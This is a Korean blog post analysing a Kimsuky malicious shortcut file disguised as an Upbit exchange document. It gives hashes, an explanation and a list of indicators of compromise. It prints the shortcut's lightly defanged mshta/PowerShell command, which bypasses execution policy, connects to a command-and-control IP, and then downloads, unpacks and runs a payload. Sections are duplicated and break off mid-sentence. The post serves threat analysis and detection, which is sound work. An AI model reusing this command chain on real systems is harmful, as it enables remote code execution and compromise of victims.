김수키(Kimsuky)암호화폐 거래소 업비트 사칭 악성코드-Upbit_20240916 docx lnk(2024.9.17)
Contents
오늘은 우리 북한 해킹 단체인 김수키(Kimsuky)에서 만든 암호화폐 거래소 업비트 사칭 악성코드-Upbit_20240916 docx lnk(2024.9.17)에 대해 글을 적어 보겠습니다.
일단 먼저 해당 악성코드 해쉬값은 다음과 같습니다.
파일명:Upbit_20240916 docx lnk.lnk
사이즈:2.30 KB
MD5:37fb639a295daa760c739bc21c553406
SHA-1:50e4d8a112e4aad2c984d22f83c80c8723f232da
SHA-256:41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229
입니다.
그리고 해당 악성코드 속성을 보시면 Mshta.exe를 사용하여 javascript를 사용을 하는 것으로 확인할 수가 있습니다.
StringData
{
namestring: not present
relativepath: ..\..\..\Windows\System32\mshta(.)exe
workingdir: C:\Windows\Sy(s)tem32
commandlinearguments: javasc(r)ipt:p="se64String($z);$";s="Strea(m)";w="a=new
Act"+"iveXObject('WScr"(+)"ipt.Shell');a.Run(c,0,0);close();";a="System(.)IO."
+s;t=" -Pa(t)h $t -";n="New(-)Object System.";d="c:\\pr(o)gramdata";c="power"
(+)"shell -ep by(p)ass -c $r='64(.)49(.)14(.)181';$p='8014';$r="+n+"IO."(+)s+"
Reader(("+n+"Net.Socket(s).TcpClient($r, $p)).Get"+s+"());$z=$r.ReadLi(n)e();$
b=[Con"(+)"vert]::FromBa"(+)p+"t='"+d+"\\t(.)zip';Set-Content"(+)t+"V $b -Enc
oding Byte;Expand-Archive"+t+"D "(+)d+";del $t;$v='"+d+"\\s(.)vbs';&$v;sc "+d
(+)"\\nt91610 81";eval(w);
iconlocation: (.)docx
}
local_base_path: C:\Windows\System32\mshta(.)exe
악성코드 분석
mshta.exe는 Windows에서 HTML 애플리케이션(HTA)을 실행하는 프로그램
HTA는 HTML 파일을 통해 스크립트를 실행할 수 있으며 해당 경로를 사용하는 이유는 mshta.exe 를 통해 JavaScript 또는 VBScript를 실행 즉 악성 스크립트가 실행되는 수단으로 자주 사용
2.명령어 분석
PowerShell 명령어
-ep bypass 옵션을 통해 실행 정책을 우회하여 악의적으로 만들어진 PowerShell 스크립트를 실행
IP 주소와 포트
64(.)49(.)14.181은 공격자의 제어 서버(C2)로 IP 주소 8014 는 해당 서버와 통신할 때 사용할 포트 번호
TCP 소켓을 이용한 데이터 전송
PowerShell을 이용하여 원격 제어 서버와 TCP 소켓을 통해 연결을 시도
연결되고 서버로부터 명령을 받을 것으로 것입니다.
파일 다운로드 및 실행
서버에서 받은 Base64 인코딩된 데이터를 변환하여 임시 …
일단 먼저 해당 악성코드 해쉬값은 다음과 같습니다.
파일명:Upbit_20240916 docx lnk.lnk
사이즈:2.30 KB
MD5:37fb639a295daa760c739bc21c553406
SHA-1:50e4d8a112e4aad2c984d22f83c80c8723f232da
SHA-256:41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229
입니다.
그리고 해당 악성코드 속성을 보시면 Mshta.exe를 사용하여 javascript를 사용을 하는 것으로 확인할 수가 있습니다.
StringData
{
namestring: not present
relativepath: ..\..\..\Windows\System32\mshta(.)exe
workingdir: C:\Windows\Sy(s)tem32
commandlinearguments: javasc(r)ipt:p="se64String($z);$";s="Strea(m)";w="a=new
Act"+"iveXObject('WScr"(+)"ipt.Shell');a.Run(c,0,0);close();";a="System(.)IO."
+s;t=" -Pa(t)h $t -";n="New(-)Object System.";d="c:\\pr(o)gramdata";c="power"
(+)"shell -ep by(p)ass -c $r='64(.)49(.)14(.)181';$p='8014';$r="+n+"IO."(+)s+"
Reader(("+n+"Net.Socket(s).TcpClient($r, $p)).Get"+s+"());$z=$r.ReadLi(n)e();$
b=[Con"(+)"vert]::FromBa"(+)p+"t='"+d+"\\t(.)zip';Set-Content"(+)t+"V $b -Enc
oding Byte;Expand-Archive"+t+"D "(+)d+";del $t;$v='"+d+"\\s(.)vbs';&$v;sc "+d
(+)"\\nt91610 81";eval(w);
iconlocation: (.)docx
}
local_base_path: C:\Windows\System32\mshta(.)exe
악성코드 분석
mshta.exe는 Windows에서 HTML 애플리케이션(HTA)을 실행하는 프로그램
HTA는 HTML 파일을 통해 스크립트를 실행할 수 있으며 해당 경로를 사용하는 이유는 mshta.exe 를 통해 JavaScript 또는 VBScript를 실행 즉 악성 스크립트가 실행되는 수단으로 자주 사용
2.명령어 분석
PowerShell 명령어
-ep bypass 옵션을 통해 실행 정책을 우회하여 악의적으로 만들어진 PowerShell 스크립트를 실행
IP 주소와 포트
64(.)49(.)14.181은 공격자의 제어 서버(C2)로 IP 주소 8014 는 해당 서버와 통신할 때 사용할 포트 번호
TCP 소켓을 이용한 데이터 전송
PowerShell을 이용하여 원격 제어 서버와 TCP 소켓을 통해 연결을 시도
연결되고 서버로부터 명령을 받을 것으로 것입니다.
파일 다운로드 및 실행
서버에서 받은 Base64 인코딩된 데이터를 변환하여 임시 …
IoC
ea96a61215ac44e295a19d3ede58e9b1fb7e6ae607ce6616d4a5337d3c4678f8
0c3fd7f45688d5ddb9f0107877ce2fbd
41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229
37fb639a295daa760c739bc21c553406
50e4d8a112e4aad2c984d22f83c80c8723f232da
69e038480a7b38ac62d7df0c416e83c67670720a
dbb2a7fd1f1653cbec4f8d4b627bef58a57799f5
c4aba442d881cfa112fe3a6b1d2381b089cbe163828cfdb2d57abba95737a07d
http://64.49.14.181
4434d291290fbc40b0b4f323f6474960ce57bbfa
f43373ad8d860b4e86e6ce82a65b99ee
b500b170146308722a95b6892fbdf88ee90dc93c
1a1723be720c1d9cd57cf4a6a112df79
64.49.14.181
6564c5e2e6193e6a947f00881a92c1a8854026ee595aa168dfedc11bc0ab8c8a
963af57641c094df6b5656552daaafd5ced0a1435261e612a4640604d023ebca
6c510785cf239cafcaf5ebf8d588689f
7b5783d42240651af78ebf7e01b31fe8
eabfadb9034062fed3d32dc290e3284741f1dd58
40756e44f5721dbb8d17bc538336d1506f2a9e30e2b049583ee3cda378de6b27
0c3fd7f45688d5ddb9f0107877ce2fbd
41cf6298a41c27357ee5f70d8cd1c0bd48698fc30c4255fad6a91798286e5229
37fb639a295daa760c739bc21c553406
50e4d8a112e4aad2c984d22f83c80c8723f232da
69e038480a7b38ac62d7df0c416e83c67670720a
dbb2a7fd1f1653cbec4f8d4b627bef58a57799f5
c4aba442d881cfa112fe3a6b1d2381b089cbe163828cfdb2d57abba95737a07d
http://64.49.14.181
4434d291290fbc40b0b4f323f6474960ce57bbfa
f43373ad8d860b4e86e6ce82a65b99ee
b500b170146308722a95b6892fbdf88ee90dc93c
1a1723be720c1d9cd57cf4a6a112df79
64.49.14.181
6564c5e2e6193e6a947f00881a92c1a8854026ee595aa168dfedc11bc0ab8c8a
963af57641c094df6b5656552daaafd5ced0a1435261e612a4640604d023ebca
6c510785cf239cafcaf5ebf8d588689f
7b5783d42240651af78ebf7e01b31fe8
eabfadb9034062fed3d32dc290e3284741f1dd58
40756e44f5721dbb8d17bc538336d1506f2a9e30e2b049583ee3cda378de6b27